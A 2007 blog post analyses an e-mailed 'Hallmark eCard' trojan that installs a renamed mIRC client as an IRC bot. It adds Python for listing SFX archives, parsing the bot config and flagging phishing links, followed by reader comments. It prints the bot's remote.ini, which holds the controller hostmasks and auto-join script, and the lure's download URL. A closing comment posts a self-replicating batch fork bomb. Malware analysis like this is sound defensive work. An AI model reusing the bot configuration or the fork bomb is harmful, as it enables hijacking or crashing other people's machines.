The Anatomy of a Virus
It appears that someone thinks that I don’t have enough viruses on my system. I received a “Hallmark eCard” (or at least that is what the e-mail said) notification today.

When I hovered over the "here" link, instead of a link to Hallmark's website I got a link to download a file called postcard.exe from a bare IP address, 83.143.18.122. A greeting-card notice that points at an IP-literal host and an executable is not the kind of thing Hallmark would send, so I decided to investigate.
Looking at the e-mail headers, it was apparent that the message had been routed through an 11u11.de host. A quick search turned up the owner of the IP address, and I sent off an e-mail to complain about the message.
What was more interesting was the postcard.exe file. I downloaded it, and it was immediately apparent that it was a self-extracting RAR archive (an SFX: a small extractor stub with the archive appended to it).
Warning! I DO NOT recommend that you do this unless you know exactly what you are doing and are working in an isolated environment!

I extracted the archive by hand with Universal Extractor, without running the stub, and got a look at its contents. Here is a list of all the files in the archive:
- aliases.ini
- control.ini
- fullname.txt
- ident.txt
- mirc.ico
- nicks.txt
- popups.txt
- remote.ini
- servers.ini
- svchost.exe
- users.ini
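As an added example (my code, not the post's and not Universal Extractor's), here is how to confirm that an .exe is a RAR SFX and list the archive's file names without ever running the stub: find the RAR marker after the "MZ" header and walk the RAR 4.x block headers that WinRAR of that era wrote. The specimen bytes are constructed for the example, the file names in it are borrowed from the list above, and the parser reads metadata only (no CRC checks, no unpacking). RAR5 archives use a different marker and are only detected here, not parsed.

```python
import struct
import sys

# Marker blocks. RAR 1.5-4.x archives (what WinRAR wrote in 2007) start with
# the 7-byte marker; RAR5 archives start with an 8-byte one.
RAR4_MARKER = b"Rar!\x1a\x07\x00"
RAR5_MARKER = b"Rar!\x1a\x07\x01\x00"

HEAD_MAIN, HEAD_FILE, HEAD_END = 0x73, 0x74, 0x7B
FLAG_LONG_BLOCK = 0x8000    # 4-byte ADD_SIZE follows HEAD_SIZE
FLAG_LARGE_FILE = 0x0100    # file header carries 64-bit size extensions
FLAG_UNICODE_NAME = 0x0200  # name field is "ascii\0<encoded unicode>"


def find_archive(data):
    """Return (kind, offset) of an embedded RAR marker, or (None, -1).
    In an SFX the marker sits after the extractor stub, never at offset 0."""
    for kind, marker in (("rar5", RAR5_MARKER), ("rar4", RAR4_MARKER)):
        off = data.find(marker)
        if off != -1:
            return kind, off
    return None, -1


def is_sfx(data):
    """A PE image ("MZ") with an archive appended after it is a self-extractor."""
    kind, off = find_archive(data)
    return data[:2] == b"MZ" and off > 0


def list_rar4_names(data, start):
    """Walk RAR 4.x block headers from the marker and collect file names.
    Metadata only: header CRCs are not verified and nothing is unpacked."""
    names = []
    pos = start + len(RAR4_MARKER)
    while pos + 7 <= len(data):
        _crc, htype, flags, hsize = struct.unpack_from("<HBHH", data, pos)
        if hsize < 7:
            raise ValueError("corrupt header at offset %d" % pos)
        if htype == HEAD_END:
            break
        if htype == HEAD_FILE:
            if pos + 32 > len(data):
                raise ValueError("truncated file header at offset %d" % pos)
            (pack_size, _unp, _os, _fcrc, _ftime, _ver, _method,
             name_size, _attr) = struct.unpack_from("<IIBIIBBHI", data, pos + 7)
            name_off = pos + 32
            if flags & FLAG_LARGE_FILE:
                high_pack, _high_unp = struct.unpack_from("<II", data, name_off)
                pack_size |= high_pack << 32
                name_off += 8
            raw = data[name_off:name_off + name_size]
            if flags & FLAG_UNICODE_NAME:
                raw = raw.split(b"\0", 1)[0]  # keep the plain 8-bit name
            names.append(raw.decode("latin-1"))
            pos += hsize + pack_size  # packed data follows the header
        else:
            add = struct.unpack_from("<I", data, pos + 7)[0] if flags & FLAG_LONG_BLOCK else 0
            pos += hsize + add
    return names


def _file_block(name, payload):
    """Build a RAR 4.x file header (method 0x30 = stored) plus its data."""
    head = struct.pack("<HBHH", 0, HEAD_FILE, FLAG_LONG_BLOCK, 32 + len(name))
    head += struct.pack("<IIBIIBBHI", len(payload), len(payload), 0, 0, 0,
                        29, 0x30, len(name), 0x20)
    return head + name + payload


# Constructed specimen (not the real postcard.exe): a fake "MZ" stub followed
# by a two-file stored archive using names from the listing above.
SPECIMEN = (
    b"MZ" + b"\x90" * 62
    + RAR4_MARKER
    + struct.pack("<HBHH", 0, HEAD_MAIN, 0, 13) + b"\0" * 6
    + _file_block(b"remote.ini", b"[users]\r\nn0=100:*!*@66.207.170.2\r\n")
    + _file_block(b"svchost.exe", b"MZ" + b"\0" * 30)
    + struct.pack("<HBHH", 0, HEAD_END, 0, 7)
)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SPECIMEN
    kind, off = find_archive(blob)
    print("sfx:", is_sfx(blob), "archive:", kind, "at offset", off)
    if kind == "rar4":
        for n in list_rar4_names(blob, off):
            print("  ", n)
```

Run it with a path to a suspect file (on an isolated machine) to get the listing; with no argument it walks the constructed specimen. Any name in the output that collides with a Windows system binary, as svchost.exe does below, deserves a closer look before anything else.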
svchost.exe was the first file to catch my attention, because that is the name of a core Windows process (the real one lives in %SystemRoot%\System32 and is signed by Microsoft). The malware is clearly meant to hide among the several legitimate svchost.exe entries in Task Manager. It also caught my eye because of its icon, which was mIRC's rather than the plain Windows one.
So, svchost.exe was actually just a renamed copy of the mIRC chat client. But why would anyone want to plant a chat client on my computer? I kept digging.
In the remote.ini file, I found something interesting. Here is the complete contents of remote.ini:
[users]
n0=100:*!*@66.207.170.2
n1=100:*!*@64.158.77.56
n2=100:*!*@estranho-colo.iquest.net
n3=100:*!*@OMGyouSUCK.users.undernet.org
n4=100:*!*@camikaze.users.undernet.org
n5=100:*!*@marianu1.users.undernet.org
n6=100:*!*@OMGyouSUCK.users.undernet.org
n7=100:*!*@NuVaVreau.users.undernet.org
n8=100:*!*@St33lGirl.users.undernet.org
n8=100:*!*@DauFlood.users.undernet.org
n10=100:*!*@66.207.170.2
n11=100:*!*@asdz.users.undernet.org
n12=100:*!*@lamerzkiller.users.undernet.org
[variables]
n0=%HAck1 #lolmp3fha | #mp3+warez
n1=%console
n2=%utime 1125548122
n3=/away :sã îmi suge-ti cuca !
n4=%ochan #lolmp3fha | #mp3´warez
n5=%reklama Ghici pe cine ai luat cu dinti de putza? ;x
n6=%owner corekt
n7=%flooder corekt
[script]
n1=on 1:connect: {
n2= /join %defchan1
n3= /join #lolmp3fha | /join #mp3+warez
n4= /away %reklama
n5=}
The [users] section gives every one of those hostmasks level 100 in mIRC's user list. That is a script access level, not a Windows privilege: it means that whatever commands the bot's scripts gate on level 100 will obey anyone whose nick!user@host matches one of the masks (note the mix of bare IP addresses and undernet.org virtual hosts, and that the n8 key is duplicated). The on 1:connect handler runs every time the client connects to an IRC server (the server list itself lives in servers.ini), joins the channel held in %defchan1 plus #lolmp3fha and #mp3+warez, and sets the %reklama text as its away message.
Time did not allow me to work out exactly what the rest of the package does. This file contains no command handlers, so the actual remote-control logic must live in the other files (aliases.ini, popups.txt) or in the client binary itself, but with a named controller list and variables called %owner and %flooder, I firmly believe that the people on that list would have been able to execute commands on my machine over IRC.
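To make the point about what the [users] list does and does not grant, here is an added example (my code, not anything from the post or from mIRC) that reads the remote.ini above the way mIRC's own access check works: it keeps duplicate nN keys (Python's configparser would reject the repeated n8), turns each hostmask into a pattern, reports the level a given nick!user@host would be granted, and pulls out the channels the on connect handler joins. The ini text is the dump from the post trimmed to the lines used; the function names are mine.

```python
import re

# remote.ini as dumped above, trimmed to the lines this example uses.
# The repeated "n8" key is in the original file.
REMOTE_INI = """\
[users]
n0=100:*!*@66.207.170.2
n1=100:*!*@64.158.77.56
n2=100:*!*@estranho-colo.iquest.net
n3=100:*!*@OMGyouSUCK.users.undernet.org
n8=100:*!*@St33lGirl.users.undernet.org
n8=100:*!*@DauFlood.users.undernet.org
[variables]
n2=%utime 1125548122
n6=%owner corekt
n7=%flooder corekt
[script]
n1=on 1:connect: {
n2= /join %defchan1
n3= /join #lolmp3fha | /join #mp3+warez
n4= /away %reklama
n5=}
"""


def parse_sections(text):
    """mIRC ini files are line based and keys (nN=) may repeat, which
    configparser rejects; keep each section as an ordered list of values."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            sections[current].append(line.split("=", 1)[1])
    return sections


def parse_users(sections):
    """[users] entries are 'level:hostmask'. The level is mIRC's script
    access level, not a Windows privilege; what it buys depends on which
    script events check for it."""
    users = []
    for value in sections.get("users", []):
        level, _, mask = value.partition(":")
        users.append((int(level), mask))
    return users


def mask_to_regex(mask):
    """mIRC hostmask wildcards: '*' any run of characters, '?' one character."""
    pattern = re.escape(mask).replace(r"\*", ".*").replace(r"\?", ".")
    return re.compile("^" + pattern + "$", re.IGNORECASE)


def access_level(users, prefix):
    """Highest level granted to an IRC prefix 'nick!user@host', 0 if none.
    With nick and ident wildcarded, only the host part is really checked."""
    return max((lvl for lvl, mask in users if mask_to_regex(mask).match(prefix)),
               default=0)


def joined_channels(sections):
    """Targets of every /join in the [script] section. A '%name' target is
    a mIRC variable this file never defines (here %defchan1), so it is
    reported unresolved for the analyst to chase in the other files."""
    joins = []
    for value in sections.get("script", []):
        joins += re.findall(r"/join\s+(\S+)", value)
    return joins


def variables(sections):
    """[variables] entries are '%name value'."""
    out = {}
    for value in sections.get("variables", []):
        name, _, val = value.partition(" ")
        out[name] = val
    return out


if __name__ == "__main__":
    s = parse_sections(REMOTE_INI)
    users = parse_users(s)
    for lvl, mask in users:
        print("controller level %d: %s" % (lvl, mask))
    print("joins:", joined_channels(s))
    print("variables:", variables(s))
    print("level for the victim:", access_level(users, "me!me@victim.example"))
    print("level for a controller:", access_level(users, "x!y@dauflood.users.undernet.org"))
```

The hostmasks, the joined channels and the server list in servers.ini are the indicators worth blocking at the firewall or reporting to the IRC network; the undernet.org virtual hosts are registered user accounts that the network's operators can act on.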
What Should You Do?
So, what is the best way to keep yourself safe from these types of problems? Here are a few really quick tips for those of you who may be new to this:
- Keep your virus signatures up to date.
- Keep your spyware signatures up to date.
- Run a personal firewall that monitors both incoming and outgoing connections; a bot like this one has to dial out to its IRC server, and an outbound alert is often the first sign of it.
- Get to know the traffic that normally comes and goes from your workstation, so that when your firewall alerts you to an outgoing connection you know whether it belongs there.
- Be paranoid about any e-mail you receive that you did not solicit.
- Check where the links in an HTML e-mail really point (hover over them or read the message source) before clicking; display text that says "Hallmark" over a bare IP address is the giveaway here.
- Set up an isolated environment, with no access to your real network or data, for testing anything you download.
- Thoroughly scan every file you download from the Internet before executing it.
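An added example for the link check in the list above (mine, not from the post): it parses the anchors of an HTML message and flags any that point at an IP-literal host, a direct executable download, or a host outside the domain the message claims to be from. The sample message is constructed here to imitate the lure described at the top of the post; only the IP address and file name come from the post.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions that mean "run me" rather than "view me"; a card site has no
# business linking to any of them.
DOWNLOAD_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".zip", ".rar")


class _Anchors(HTMLParser):
    """Collect (href, visible text) for every <a> in the message body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_links(html, claimed_domains):
    """Return (href, text, reasons) for every link that does not belong in
    mail claiming to come from one of `claimed_domains`."""
    parser = _Anchors()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        url = urlparse(href)
        host = (url.hostname or "").lower()
        reasons = []
        if host and _is_ip_literal(host):
            reasons.append("ip-literal host")
        if url.path.lower().endswith(DOWNLOAD_EXTS):
            reasons.append("direct download of %s" % url.path.rsplit("/", 1)[-1])
        if host and not any(host == d or host.endswith("." + d) for d in claimed_domains):
            reasons.append("host %s is not under %s" % (host, "/".join(claimed_domains)))
        if reasons:
            findings.append((href, text, reasons))
    return findings


# Constructed sample imitating the lure in the post: the body claims to be
# from Hallmark, but the "here" link goes to a bare IP and an .exe.
SAMPLE_MAIL = """
<p>You have received a Hallmark E-Card from a friend!</p>
<p>To see it, click <a href="http://83.143.18.122/postcard.exe">here</a>.</p>
<p><a href="http://www.hallmark.com/">Hallmark.com</a></p>
"""

if __name__ == "__main__":
    for href, text, reasons in suspicious_links(SAMPLE_MAIL, ["hallmark.com"]):
        print('"%s" -> %s: %s' % (text, href, "; ".join(reasons)))
```

The same three checks are what you do by eye when you hover over a link; the code just does them for every anchor at once, which matters when the real and the fake links sit side by side as they do in this lure.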
19 Responses to “The Anatomy of a Virus”
-
Andy Says:
May 29th, 2007 at 6:20 am
lol - a spell checker attached to your antivirus scanner would have detected the spelling in the email and notified you that it is probably not legitimate

-
Mike Says:
May 29th, 2007 at 7:03 am
Looks like someone was trying to recruit your machine to an IRC botnet.
You should report this to your anti-virus company and/or report it on Security Focus. Also, I suspect that mIRC is a hacked and patched version that allows remote command and control.
This is a clever way to distribute the malware, reminiscent of the old "Happy New Year 2000" program that went around in the old days.
Good catch. Perhaps someone in the know could hack that IRC channel and shut it down.
-
JoeAtTrends Says:
May 29th, 2007 at 8:25 am
I remember hearing about something similar to this, but as I remember it that was a standard mIRC client set up in advance for remote access to a command line. One of the main problems in catching this (after you clicked on the link, that is) is that any signature of the program used in such an attack will in fact match a legitimate program used for legitimate purposes. I know that Symantec is notorious for antitrust-style marking of legitimate programs as viruses (namely ones that perform the same or better than their own products, RAdmin22 vs PCAnywhere), but I doubt they could get away with marking so many legit programs as viruses.
The best defense would be to always check the links you click on.
-
Tim Fehlman Says:
May 29th, 2007 at 8:29 am
Andy,
"I before E, except after C, or when it says long A." Looks like the hacker failed third grade English. Considering it came from a .de domain, it's not surprising.
Hacker Tip: When trying to mimic a professional English website, know English!
Tim
-
John May Says:
May 29th, 2007 at 9:49 am
Just downloaded that postcard.exe file and McAfee VirusScan caught it and labeled it as a Trojan IRC/Generic Flooder. I've got a screen shot of the warning: trojan.png.
-
Kurt Nelson Says:
May 29th, 2007 at 10:01 am
It seems as if I can't connect to any of those botnets. Do you think they require a hacked IRC client?
-
Robert H Says:
May 29th, 2007 at 12:29 pm
I'm following them in their little bot channel, and they have almost 450 trojaned clients in there already. It's pretty scary.
-
panthar Says:
May 29th, 2007 at 12:52 pm
You won't be able to "connect to the botnets" unless you are in the list of authorized users. It's similar to other botnets out there in terms of authentication, but unfortunately this one lives as a nasty trojan on victims' computers. The channel where all the bots are moving to is up to well over 400 victims now.

-
Panthar's Lair Says:
May 29th, 2007 at 12:58 pm
Postcard Virus Sets Up IRC Botnet…
http://www.dailycupoftech.com/2007/05/29/the-anatomy-of-a-virus/
Looks like yet another botnet is building up from a trojan being sent around as "Postcard.exe". I followed the botnet to a new channel, and they have almost 450 cl…
-
Nate Says:
May 29th, 2007 at 1:58 pm
Another very important security procedure is applying the principle of least privilege, i.e. use a "limited" user for everyday tasks, use "runas" for installations and programs that require admin rights, and only log in as an admin when absolutely necessary, like to run Windows Update. For those who are interested, Google for a program called suDown. It makes running with least privilege even easier.
Even if a virus like this gets executed by mistake when you are running as a limited user, it will not be able to modify system files, or create registry entries, so in almost all cases it will be rendered useless by a simple reboot. Also, those remote IRC users would get a bunch of “access denied” errors if they tried to do anything serious to the system.
This is not a panacea: anti-virus software and good judgment (as suggested above) are still a must.
-
JoeAtTrends Says:
May 29th, 2007 at 3:06 pm
Another great tool alongside anti-virus and any firewall software is something called Sandboxie. It is the next best thing to a virtual machine, especially for running any questionable programs: every file modified on the hard drive is only seen as modified by that program, as long as it is run inside the sandbox. It keeps programs from overstepping their bounds. Best of all, whenever you are done with it you can make sure every file they added is removed by erasing the sandbox.
-
JC Says:
May 29th, 2007 at 4:28 pm
Tim, are you taking yourself for Mark Russinovich?
http://blogs.technet.com/markrussinovich/archive/2007/04/09/741440.aspx
Just kidding, I know it is a coincidence, and we can never speak too much about how malware works and how to detect it anyway…
Note though that, as Mark Russinovich pointed out, this bot is very badly designed and there are roughly a dozen things that could have been done to render it stealthier to both the user and antiviruses… so it could be the doing of a script kiddie here… (the most well-done part here is the fake e-mail layout, which can look quite legitimate at first sight). Unfortunately, what quickly looks suspicious to us IT people may not look so to most, even "security-educated" users, and when they click the button, most of the time it is too late.
That is why I believe that joke and postcard e-mails should be forbidden in any company and organization… they are just a spyware, virus and spam vector (even if a legitimate service is used, who knows what they do with my e-mail address once a friend has given it away to them to send me a birthday card… I always scold them when they do that without my consent - being in a bad mood because of getting older certainly doesn't help either - ^_^;)
-
Nuke’s NEWS & VIEWS Says:
May 29th, 2007 at 4:41 pm
that tipped me off. I before e except after c, and all. I deleted it, along with several dozen others that managed to slip by the spam filter. Tim Fehlman did some investigating. The results are found in his post at DCoT: "Anatomy of a Virus." This file gave all of the users under the [users] section elevated privileges on the system. It also automatically connected to several different servers and joined some channels. While I was not able to completely determine what this would have done
-
Atti Says:
May 31st, 2007 at 7:09 am
The following lines from remote.ini contain an away message in Romanian and set the %reklama variable to another text message (also Romanian). "reklama" means advertisement in Romanian, but it is written in slang:
n3=/away :sã îmi suge-ti cuca !
n5=%reklama Ghici pe cine ai luat cu dinti de putza? ;x
And better not to translate, because there are some offending words. It was probably crafted by a Romanian "scriptkiddie" to use later for flooding IRC channels.
-
Buffy Says:
June 26th, 2007 at 5:52 pm
Hi,
Sorry if I shouldn't be here…but help!!! I got this stupid thing and, being half asleep, thought it was from my daughter who has been at camp. Yes, I know, sucks to be me. I, well, never mind, I won't go into all the details of how it happened. Just suffice it to say it did, and as soon as I saw the command prompt..I had some of my own offending words to yell!! So, now what? I am not very tech savvy and FREAKING out. My son disconnected it from the network immediately. Then I turned it off, or at least I tried….it didn't like the idea. But I won that round. Next, I turned it back on to see what would happen. (I know, but I had to, kinda like watching a train wreck.) Prompts came up saying things like new nicknames and users, also, trying again, connection stopped…over and over again. I clicked something that said connection canceled (it seemed appropriate) and gave another offending verbal command to whomever and turned it off again.
Where do I go from here? I am using my son's computer to write this and look for answers. Would only my computer be affected?
Again, sorry if this is not an appropriate place to ask for help. Any reply is appreciated.
Buffy
-
Haloer Says:
July 14th, 2007 at 8:19 am
A. This was recruited as a bot
B. Your computer was about to become a zombie
C. It could be a keylogger that sent a private chat to users of anything that you typed..
-
Haloer Says:
July 14th, 2007 at 8:26 am
Buffy, please contact me or you can do this on your own:
(MAY NOT WORK)
1. Restart computer and tap F8 on start up
2. Go into Safe Mode
3. When started up click on admin.
4. When it asks you to use Windows Go Back, say that you would like to. (This is tricky because the question doesn't really mean yes or no, it's kinda backwards..)
5. Choose a date before the time of the attack.. I would say about 2 or 3 days before for safety..
6. It will run and restart after this. See if things are still happening.
Optional:
If things don't seem to be working, try calling Dell or Microsoft. If those don't appeal to you because of the $99 cost, please email me at haloer(dot)2202(at)gmail(dot)com. This is to protect my email from fraud, so please remember to change the signs..
-
pogi Says:
August 27th, 2008 at 3:00 am
start cute.bat
cute.bat
end
save as "cute.bat"

